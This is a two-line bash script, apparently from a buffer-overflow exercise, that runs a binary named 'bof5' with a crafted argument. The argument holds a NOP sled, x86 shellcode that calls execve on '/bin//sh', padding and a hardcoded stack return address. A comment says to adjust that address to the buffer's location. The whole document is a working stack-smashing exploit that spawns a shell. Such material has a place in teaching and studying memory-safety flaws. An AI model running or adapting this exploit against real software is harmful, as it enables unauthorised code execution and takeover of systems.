#!/bin/bash
# edit the return address depending on the buffer address
./bof5 $(python -c 'print "\x90"*40+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"+"a"*35+"iiii"+"pppp"+"$ebp"+"\x0c\xf5\xff\xbf"')
